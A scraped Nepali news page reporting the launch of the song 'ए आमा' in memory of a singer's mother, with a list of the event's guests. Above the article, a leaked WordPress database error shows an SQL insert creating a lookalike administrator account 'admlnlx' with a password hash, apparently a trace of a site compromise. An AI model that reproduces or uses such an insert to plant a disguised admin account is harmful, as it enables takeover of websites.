WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvFcrpTXaGOOFhxfqqJDADWSYhd4060', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:37:49', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । “ए आमा” बोलको गीतको लिरिकल भिडियो सार्वजनिक भएको छ ।
सोलुखुबु नेचा निवासी प्रश्न बहादुर राईले आफ्नी आमा बिम्बालक्षी राईको स्मृतीमा ‘ए आमा’ गीत न्रिमाण गरेका छन् । १९९८ मा जन्मेकी राईको २०७६ मा निधन भएको थियो ।
गायक तथा संगीतकार जसिहाङ राईको शब्द र संगीतमा तयार भएको गीतमा चर्चित गायीका रजिना रिमालको स्वर सुन्न सकिनेछ । नोर्वु शेर्पाको संगीत संयोजन रहेको गीत आज ललितपुरको चाँपागाउँमा आयोजित एक कार्यक्रममा सार्वजनिक गरिएको छ ।
गाउँले इन्टरटेनमेन्ट मिडिया ग्रुप प्रालिको गाउँलेइन्टरटेनमेट युटुबबाट च्यानलबाट अहिलेको डिजिटल बजारमा सार्वजनिक गरिएको लिरिकल भिडियोमा आमाको भूमिकालाई सम्झनाको तरेलीमा पोख्ने काम गरिएको छ ।
प्रोफेसर इश्वरी प्रसाद बन्जाडेको प्रमुख आतिथ्यतामा सम्पन्न सार्वजनिक कार्यक्रममा गायक संगीतकार जसिहाङ, गायिका रजिना रिमाल, मुना राई, पूर्वप्रहरी निरिक्षक भिम कुमार राई, जिमिराई उत्थान समाज सोलुकी केन्द्रीय उपाध्यक्ष सरिता राई, सञ्चारकर्मी धनबल राई, व्यवसायी इन्द्र थुलुङ, धन कुमार राई, सामाजिक अभियान्ता युजन राई, राधिका ताम्रकार लगायतको उपस्थिति रहेको थियो ।